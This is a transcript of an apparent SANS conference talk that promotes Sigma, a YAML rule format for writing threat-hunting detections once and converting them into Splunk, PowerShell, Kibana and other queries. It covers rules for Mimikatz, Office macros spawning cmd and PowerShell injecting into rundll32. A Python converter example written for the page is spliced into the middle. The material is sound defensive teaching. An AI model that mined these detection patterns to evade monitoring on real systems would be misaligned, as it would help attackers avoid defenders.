All right, all right, so let's shift gears a bit: Sigma. So we have this kind of Tower of Babel now, where, I mentioned, we have NSM and we have CSM, and we've got Splunk, we've, you know, Splunk or ArcSight or Elastic, all great tools, all different syntax. On the NSM side we've got Snort, Suricata, which have, you know, pretty much the same rule language, but then you get Bro/Zeek, which is totally different, right. And you want to search for this one thing: I want to find Mimikatz in Splunk, I want to find Mimikatz in ArcSight, I want to find Mimikatz in Elastic, I want to find Mimikatz on Snort or Suricata or Bro. You'll end up having to hire all these experts who know all that stuff. Now maybe you probably have one major SIEM, like a major commercial vendor, but you might have two. Well, a lot of SOCs I see have the tactical SIEM, right. So the compliance people insist... you know, if you go to a SOC and they're bragging about how many millions of events they handle per day, that's the wrong... that's the wrong mentality; it should be quality, not quantity, right. And so I do see SOCs with two SIEMs, right. You've got the compliance SIEM, which the compliance officers love, and you're handling 10 million events per day, haha, right. And often these things, you know, it's not the vendor's fault; the budget wasn't big enough, too much data was thrown at that thing and it's slow, right. So you do the big, on some of these big vendor searches, you do a search, get a cup of coffee, come back, the search completes, right. That's the
compliance SIEM. And I've been in SOCs, I'm like, hey, you know, how about we have less data in that SIEM, how about we strip stuff out? Like, no, Eric, we need this for compliance purposes, this is our compliance engine. Like, well, if it takes five minutes to make a search, compliance is now harming security, you know, it's actively harming security, right. And I was in a SOC once, it was just like that: seven minutes per search, handling 10 million events per day, and I'm walking through that SOC and on the screen I see Security... you know, the new Elastic version of Security Onion. Like, oh, cool, Security Onion, I love that. And the guy just shushes me: don't tell anyone. Like, what? Don't tell anyone you saw that. I'm like, why? If management finds out we're using this, they'll take it away and make us use that awful thing, and we don't want it, we don't. So what happened? They literally went and kind of begged, borrowed, stole hardware, put it in the closet, literally hid the server, and the compliance SIEM got, tell me, 10 million events per day, and Security Onion got like 1% of that, right. And what they would do, they'd do Security Onion day to day, and when they found something they needed the deep dive on the compliance data, they made the deep dive, right. So day to day, tactically, they use the tactical SIEM, then deep dive on the giant compliance repository, right. And that's how they got through the day. Now I'm not saying, on a whiteboard, draw two SIEMs; no one would do that. But hey, if that's what gets it done in that environment, given the politics and the regulations and everything, fine. But now you've got two SIEMs to search on, two sets of logic, two syntaxes, etc. So we had this Tower of Babel style stuff, and a lot of it's hard to... I want a Splunk expert with five years of experience? That's going to be expensive, you know, it's going to be expensive, right, because those people are in massive demand for obvious reasons, right. So how do you kind of manage this? And this tool, Sigma, it's the kind
of tool, like, why didn't I think of that? You know, I already wrote DeepBlueCLI, I was, like, close to that, you know, but this is just genius, it's just genius. What if we come up with a universal language for a piece of... we have a universal language for a piece of malware, right, and we kind of distill it down to its elements, right, and we write this kind of meta rule, this meta rule describing Mimikatz or whatever, right. And then once we have the meta rule we have a parser: just generate Splunk output, or, you know, Elastic output configuration, or the PowerShell syntax or grep syntax or ArcSight syntax based on this meta rule. So write this universal rule, and then just run the parser, and it would do an output plugin and create Splunk or ArcSight or whatever. It's really cool, really, really good stuff. I've been playing around with it a lot building up this talk, and man, I am quite impressed. I've already got ideas; I'm going to distill some stuff from DeepBlueCLI that this thing's not doing and actually submit it over that side. I don't need you to use DeepBlueCLI; I just want to help, you know, I just want to help the tech stuff, however that happens, I'm on board with it, right. So Sigma is this kind of Rosetta Stone to unlock all these languages, and it also allows more junior staff to get more done. Yeah, I want some senior folks in a SOC, but it can be mostly juniors. If I have 80% juniors and 20% seniors, rock and roll, rock and roll, right. But it helps them move faster as well, right. So what would it take to do this? Can we distill a malicious event or software down to its elements? You describe it through strings, whatever port it's using, the registry run key it creates, whatever that thing is; distill it down to its basics, its fundamentals, write a rule in YAML, and then create these outputs, right, for Splunk, whatever. And that's Sigma. Very impressed, right. So what Snort is to network traffic, YARA is to files, right. So Snort, of course, being NSM, network security
monitoring, and because Snort has become the universal language outside of Bro/Zeek, that Snort rule is pretty universal. You know, you use that Snort rule in Suricata, you use that Snort rule in, you know, a number of vendors, you know, firewalls, next-gen firewalls, things like that: Fortigates, Fortinets, they use Snort syntax. So Snort kind of became the universal language of NSM outside of Bro/Zeek, but almost every other IDS understands Snort rules, takes Snort rules directly. We had something similar; for the CSM side we never had that. Now Sigma does that. Really nice tool.

So here's that rule I talked about, right. So title: Office Macro Start CMD, and it's a description, references, and it's looking, using now, Sysmon event 1, right. So give me Sysmon event 1, and if I see the parent image being winword or excel, right, and those things launch cmd, you tell me, right. So instead of writing that in Splunk... we'll do it in Splunk in a minute, but starting with a Splunk rule or starting with the ArcSight rule or starting with the Elastic rule, let's start with the fundamental idea, the logic of what that thing is doing, what am I actually looking for; describe that in this kind of meta language and then create these output plugins, right. So I'll create, once they have the Sigma rule, I'll say give me the Splunk version of that, or the QRadar version of that, or the grep version of that, or the PowerShell version of that, right. This allows us to threat hunt across various platforms, and again, I'm quite impressed by this; it's a clean idea, it's very well executed. And even if you don't end up using Sigma, what you can do is, like, look through the rules that it'll... real quick, I'll do a more formal demo in a bit, but here it is here, and I was playing around with this earlier, of course, right. So let's look at the Sysmon rules. So let's look at these, so here are the Sysmon rules. So if you don't use Sigma, you just look at the rules, see what it's doing. So those are all the Sysmon rules. Oh,
list the Sysmon rules for, you know, APTs, various exploits, Cobalt Strike beaconing, Mimikatz of course, malware drop, a password dumper, PowerShell exploits, things like that. You don't use Sigma directly; you can go through a list of rules and see what they're looking for, you know, and then, oh, that's interesting, like, you know, winword launching cmd, I never thought of that, right. So there's all good threat hunting ideas in here, and of course then you get the direct syntax to do it, which I'll show you momentarily, right. It's not just Sysmon, it's all kinds of stuff. Yep, they come with Sigma. This is straight from... great, so the question is, do these rules come with Sigma? Yeah, right from the GitHub set, you know, and you can write your own; it's very easy to write them, actually, but these are straight from Sigma themselves. And then, to your point, a lot of people end up writing their own as well, you know. So instead of writing... if you want to write your own custom rule, you can write it in Splunk or ArcSight or Elastic, but it's probably better to write it here, this way, that way you can output it any way you want, right. Super useful stuff, right. So we've got built-in rules, malware rules; let's go to malware ones. This is for Windows now, of course, right. And lots and lots of Sysmon rules. So again, if you turn on Sysmon logging you get all kinds of good stuff; it's not just command line auditing, it can watch the registry, it can look for persistence mechanisms; lots of things Sysmon can do to give you that visibility, right. So I'll come back to that momentarily; I've run a few commands to show you how it works. So again, this is a YAML file, easy schema: this metadata, log source, detection and condition. And here's a kind of a rule, now Sysmon event 8, and it's called PowerShell rundll32 remote thread creation, right. It's grabbing a Sysmon event 8, which is CreateRemoteThread, right, looking for source image PowerShell, target image rundll32, so PowerShell launching rundll32.
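The two rules just described (Office application launching cmd.exe via Sysmon event 1, and PowerShell creating a remote thread in rundll32.exe via event 8), carried through the write-once, output-anywhere idea as an added Python example. This is not Sigma's own sigmac or its rule files: it is a miniature converter that takes a rule in the title/logsource/detection/condition layout, emits a PowerShell `Get-WinEvent` pipeline and a Splunk search for it, and also evaluates the rule directly against constructed Sysmon records so the logic can be checked offline. The Sysmon field names (`Image`, `ParentImage`, `SourceImage`, `TargetImage`) are Sysmon's; the `|endswith` modifier is Sigma's; the generated query text, the `XmlWinEventLog:` source name and the sample events are assumptions of this example, and only `condition: selection` is handled.

```python
"""Miniature Sigma-style rule converter and evaluator.

Added example, not Sigma's own sigmac or its rules. A rule is written once
as title/logsource/detection/condition (the Sigma layout the talk shows)
and emitted as PowerShell and Splunk search syntax, then evaluated directly
against constructed Sysmon records so the logic can be checked offline.
Only 'condition: selection' with equals/endswith/startswith/contains field
modifiers is supported; the Splunk source name is an assumption.
"""
import re

SYSMON_LOG = "Microsoft-Windows-Sysmon/Operational"

# Rule content mirrors the two rules described in the talk (Office macro
# launching cmd via Sysmon event 1; PowerShell -> rundll32 via event 8).
OFFICE_MACRO_CMD = {
    "title": "Office Macro Starts CMD",
    "logsource": {"product": "windows", "service": "sysmon"},
    "detection": {
        "selection": {"EventID": 1,
                      "ParentImage|endswith": ["\\winword.exe", "\\excel.exe"],
                      "Image|endswith": "\\cmd.exe"},
        "condition": "selection"}}

PS_RUNDLL32_THREAD = {
    "title": "PowerShell rundll32 Remote Thread Creation",
    "logsource": {"product": "windows", "service": "sysmon"},
    "detection": {
        "selection": {"EventID": 8,
                      "SourceImage|endswith": "\\powershell.exe",
                      "TargetImage|endswith": "\\rundll32.exe"},
        "condition": "selection"}}

# Constructed Sysmon records (field names as in Sysmon's EventData).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 8, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetImage": "C:\\Windows\\System32\\rundll32.exe"},
]


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _split_field(key):
    """'ParentImage|endswith' -> ('ParentImage', 'endswith')."""
    field, _, mod = key.partition("|")
    return field, mod or "equals"


def _value_matches(mod, actual, wanted):
    a, w = str(actual).lower(), str(wanted).lower()   # Windows paths: case-insensitive
    return {"endswith": a.endswith(w), "startswith": a.startswith(w),
            "contains": w in a}.get(mod, a == w)


def match_event(rule, event):
    """True if every selection field matches (a list value means any-of)."""
    det = rule["detection"]
    if det["condition"] != "selection":
        raise ValueError("only 'condition: selection' is supported here")
    for key, wanted in det["selection"].items():
        field, mod = _split_field(key)
        if not any(_value_matches(mod, event.get(field, ""), v) for v in _as_list(wanted)):
            return False
    return True


def hunt(rule, events):
    return [e for e in events if match_event(rule, e)]


def _ps_pattern(mod, value):
    v = re.escape(value)          # escapes backslash and dot for the .NET regex too
    return {"endswith": f".*{v}", "startswith": f"{v}.*", "contains": f".*{v}.*"}.get(mod, v)


def to_powershell(rule):
    """Get-WinEvent pipeline matching the rendered Message text line by line."""
    clauses = []
    for key, wanted in rule["detection"]["selection"].items():
        field, mod = _split_field(key)
        if field == "EventID":
            clauses.append(f"$_.Id -eq {wanted}")
            continue
        alts = [f"$_.Message -match '(?m)^{field}: {_ps_pattern(mod, v)}$'"
                for v in _as_list(wanted)]
        clauses.append(alts[0] if len(alts) == 1 else "(" + " -or ".join(alts) + ")")
    return f"Get-WinEvent -LogName '{SYSMON_LOG}' | Where-Object {{ {' -and '.join(clauses)} }}"


def _spl_value(mod, value):
    v = value.replace("\\", "\\\\")   # SPL quoted strings need escaped backslashes
    return {"endswith": f"*{v}", "startswith": f"{v}*", "contains": f"*{v}*"}.get(mod, v)


def to_splunk(rule):
    """SPL search; the XmlWinEventLog source name is an assumption."""
    terms = []
    for key, wanted in rule["detection"]["selection"].items():
        field, mod = _split_field(key)
        if field == "EventID":
            terms.append(f"EventCode={wanted}")
            continue
        alts = [f'{field}="{_spl_value(mod, v)}"' for v in _as_list(wanted)]
        terms.append(alts[0] if len(alts) == 1 else "(" + " OR ".join(alts) + ")")
    return f'source="XmlWinEventLog:{SYSMON_LOG}" ' + " ".join(terms)


if __name__ == "__main__":
    for rule in (OFFICE_MACRO_CMD, PS_RUNDLL32_THREAD):
        print(rule["title"], "->", len(hunt(rule, SAMPLE_EVENTS)), "hit(s)")
        print(to_powershell(rule))
        print(to_splunk(rule))
```

Running it prints one hit per rule against the sample records (the explorer.exe-to-cmd.exe record is correctly left alone) followed by the PowerShell and Splunk renderings. As the talk notes for the real sigmac output, the PowerShell line still needs to be pointed at the right log; here that is the `-LogName` argument, which can be swapped for `-Path some.evtx` when working from a saved file.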
That is a common way to inject DLLs. Another way to avoid antivirus, of course, is to inject DLLs straight into RAM, right, so that's another common way. Sysmon gives you visibility into that. One note on Sysmon, from a performance hit: you can log every DLL as it's loaded; that's actually useful, but that can be a performance hit, because, like, PowerShell is going to load like 80 DLLs or something, right. So you can log, like, the hash of every single DLL loading, which is amazing visibility, but that can be a performance hit, just FYI. Sysmon runs like a dream; that's really what you want to be careful of. I mean, it's a trade-off: I want that visibility, but is it worth the cost, kind of thing, right. But there's other ways to... remote thread creation, things like that, right.

And we have classifiers now, so we have groups of products: Squid, pfSense, Symantec, Snort, Windows; we have a service, we have description. And again, the list of supported outputs is pretty amazing. You probably use, I mean, you have some of these tools, whether it's PowerShell or grep, but I'm sure everyone here has a number of these tools, maybe three or four, to use. So it's pretty simple: sigmac, I want the output to be, the syntax to be, PowerShell syntax, and I want to do sysmon susp PowerShell rundll32, and bang, it literally gives you a command line to copy/paste. So you grab that. The only thing, just a pro tip on the PowerShell stuff: you have to put the log in. It says Get-WinEvent, pipe to Where; you have to tell it which log you want to look at, yeah, because it can process both a saved event log or the live event log depending on how you're doing it, right. So if you saved the EVTX file, put it right up to the Get-WinEvent, put the path, whatever, right, or the live event log. So if you copy/paste this and you're playing around with it, you just have to tell it which event log to look at; in this case it would be the Sysmon log, of course, Operational, etc., right. And that's the PowerShell syntax. Here's the Splunk
syntax, right, same exact event. And again, the beauty of this is you write one rule and then, boom, the Rosetta Stone unlocks all the stuff. Really useful stuff, right, really useful stuff. I've got a ton of ideas going through those rules; I'm sure you will as well. And also here's Kibana, right, so here's a Kibana rule, right. And again, there's a big move to Elastic now. Elastic is disrupting the SIEM industry in a good way, right. A lot of vendors are adding Elastic on the back end; Elastic is basically big data for, you know, lots of stuff, big data, open source, but a lot of IDS vendors are moving to... our SIEM vendors are moving that way. There's a huge demand for Elastic talent now, right. So, you know, and a lot of companies are nervous about moving to Elastic because they don't know how to use it, you know, the syntax, understandably. So how do I support this thing? Who's the vendor again? But this helps you kind of close that gap, right.

Let me do a little demo now. All right, Sysmon, let's go, GhostPack. So I'm looking for the sysmon GhostPack SafetyKatz, yeah, .yml. I'm getting the PowerShell syntax, so you can literally just copy/paste this thing right into PowerShell; just add which event log you're looking for. Or of course, let's look at the... let's just run sigmac to see what outputs are supported, and you have a list right here: so ArcSight, Kibana, Elastic, Graylog, grep, NetWitness, PowerShell, QRadar, Qualys, Splunk, etc. So let's do the Splunk version of that, Splunk, Splunk, pretty simple, or the ArcSight version; you get the idea, right. And while we're here, let's look at the actual file. So here's the actual rule itself, and so it's using a Sysmon EventID 11, TargetFilename Temp debug.bin, so that piece of malware creates that file, and there you go. All right, cool stuff.

All right, I want to give a shout out to John Hubbard, yes. He helped with the Sigma stuff because it was newer to me, and I was talking to him and Justin Henderson, I'm
like, hey, I got a Sysmon talk, I want to add some new sexy. And John's like, oh, I have the new sexy, right. John wrote a blue team fundamentals course, so shout out to my friend John. Blue Team Fundamentals was born out of 511. So in 511 we had MSSPs send their employees through 511, and some of them got slaughtered because they were 19 years old, you know, or 23 years old, right. We see this, you know, and we didn't like... they didn't know what a packet was, they didn't know what ping was, and they're monitoring events 24/7/365 with the team of highly trained analysts. This is not all MSSPs, this is some MSSPs, I'm sorry, I'm sorry. And so they did, and the MSSP is trying to train them up, which is great, you know, and they took 511; they didn't know what UDP is, and they were just killed. So we even need, for onboarding people who are newer to this, right, how do we bring that person in? I was a clueless newborn myself; how do we do that, you know? How do we onboard people in the finishing? The way it stands was 301, 401, 501; that's a lot of time and a lot of investment, and when you want a narrower skill set, right. And so John, the beta is running, as you see there, in Crystal City. The beta is the initial run; it's basically half price, so go to the class, SEC450. You have some more junior folks. And thanks, folks, I'll hang around for any questions, and thank you, thank you.
Info
Channel: SANS Institute
Views: 28,035
Rating: 4.9603958 out of 5
Keywords: sans institute, information security, cyber security, cybersecurity, information security training, cybersecurity training, cyber security training, sans summits, sans conferences, blue team
Id: 7dEfKn70HCI
Length: 51min 0sec (3060 seconds)
Published: Mon Jul 22 2019